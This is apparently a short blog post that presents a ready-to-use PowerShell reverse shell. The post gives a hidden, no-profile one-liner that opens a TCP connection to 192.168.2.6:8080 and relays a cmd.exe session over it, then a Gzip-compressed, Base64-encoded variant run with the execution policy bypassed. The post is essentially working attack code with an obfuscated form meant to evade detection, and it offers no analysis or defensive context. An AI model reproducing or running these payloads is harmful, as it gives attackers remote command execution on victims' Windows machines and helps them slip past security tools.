Monday, July 8, 2019
Powershell reverse shell
powershell -w hidden -nop -c function RSC{if ($c.Connected -eq $true) {$c.Close()};if ($p.ExitCode -ne $null) {$p.Close()};exit;};$a='192.168.2.6';$p='8080';$c=New-Object system.net.sockets.tcpclient;$c.connect($a,$p);$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize;$p=New-Object System.Diagnostics.Process;$p.StartInfo.FileName='cmd.exe';$p.StartInfo.RedirectStandardInput=1;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.UseShellExecute=0;$p.Start();$is=$p.StandardInput;$os=$p.StandardOutput;Start-Sleep 1;$e=new-object System.Text.AsciiEncoding;while($os.Peek() -ne -1){$o += $e.GetString($os.Read())};$s.Write($e.GetBytes($o),0,$o.Length);$o=$null;$d=$false;$t=0;while (-not $d) {if ($c.Connected -ne $true) {RSC};$pos=0;$i=1; while (($i -gt 0) -and ($pos -lt $nb.Length)) {$r=$s.Read($nb,$pos,$nb.Length - $pos);$pos+=$r;if (-not $pos -or $pos -eq 0) {RSC};if ($nb[0..$($pos-1)] -contains 10) {break}};if ($pos -gt 0){$str=$e.GetString($nb,0,$pos);$is.write($str);start-sleep 1;if ($p.ExitCode -ne $null){RSC}else{$o=$e.GetString($os.Read());while($os.Peek() -ne -1){$o += $e.GetString($os.Read());if ($o -eq $str) {$o=''}};$s.Write($e.GetBytes($o),0,$o.length);$o=$null;$str=$null}}else{RSC}};
Gzip compressed and Base64 encoded:
powershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIAG6iVVsCA51WXW/bNhR996+4cLVaQixCMbAiC5BirpJuAbLWqLzlwTAQWrqOtcikSlL+QOL/XlKiLDlO0GV6sUVennvuuR/UOxjxNYp5wcCHW5EqhQxmW/ikf8aFYCjgPVzSFcKfVCTbTkdbxirlDP5A5d/iLM5SZAo6jx3Qj7OO4QK+4Nr/OvsXYwX+eJvjF7pEvaiItg9L+9qY/C3xEue0yFQoMNE7Kc2khnCUKHBvNRJ8syXPLPR6a6W27ewainkdWucRyv0RFXTpVv8nkRIpu586IV8uKUv6h6uRzGLOni1e8jXLOE3KVc9iCh6jlGAFWPKkyNAQ/N31oDJJ5+DWbsDH79CdpSzpeuVmda48m6VSy68lv9Aut/r/khjVIh4/oJJkHOc31mJ6FpwFxweJVFQo49d6Lndtii5adsM4xlxpwCodbkVl9xpdgSsUEo8Z76FbKX+JeTiyjrqnvw3I6YczMiAfun0ThXXdqeSTSiBdGq4VNNFlFpVrmmPDrspORc5UStcmo0VNyiyqwV5hh3GhK35LotrUtf77zlyXFPbdR2es0XfgUwmTgzPfcMkVhihUOk9jqvAfmqUJNXUX0iyb0fhh6nkv0CHDQi1M0ZpDQ/mSLl4reY0gTUBtxSazrcLJdOqYX1N2ASGDQD9PvzwGOysqsqTedicKN4ogi3liavr8fBiF19eeEfqTsXG7t7o4+VpWkyFaYJaBKBjT1qBlKKQu0C6cgINsdW7emGnvE72mM7LfiPkyL1SzecdCnm9Fer9Q4IYeDILTX+GvNBZc8rmCkIuci1I+AkPj0VhKEKgdrDAhd+yO2fqzmhAzrtBtousH/eaF3CC7V4t20dTd2y6bo6p5m1STkyncaEijje18suf5dq71qc9cXNF4oTlXoJCy/WRprBra5nEPBrJH6mir2VUjeU/XbMUf0L/a5FpbqfXeo+wOO/FNSvRGEfR0nksWNzwuM+mREVULvdr72PvfqVsv0gxd10nLHqiOf0OauFXF9yHog3NwzgOfIQRHub0y9DEZ61Beu6TsdDAmpAzxyobcoOgep4ZKC80OqVLmOhxwUu9ZWemRYLQ8SgD49bCtwAcf35/CE3wtlF+hgpXiAGoApSA1sBb5JymAXgOyMUQcFIKLSTA9cNZiXe6TOEMqXO8lBhftF934m85xJ/2n8mlgfto67VI5apz6zOeskIv9/WvHoL1RwoxLtPE0N2KkeF5fg/oborP/dtgnx16C4NvLxwyQHwiZvks/CQAA'))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))"
Subscribe to:
Post Comments (Atom)
-
Curso Wireshark na UDEMY https://www.udemy.com/curso-profissional-sobre-wireshark/learn/v4/overview A filtragem em sinalizadores...
No comments:
Post a Comment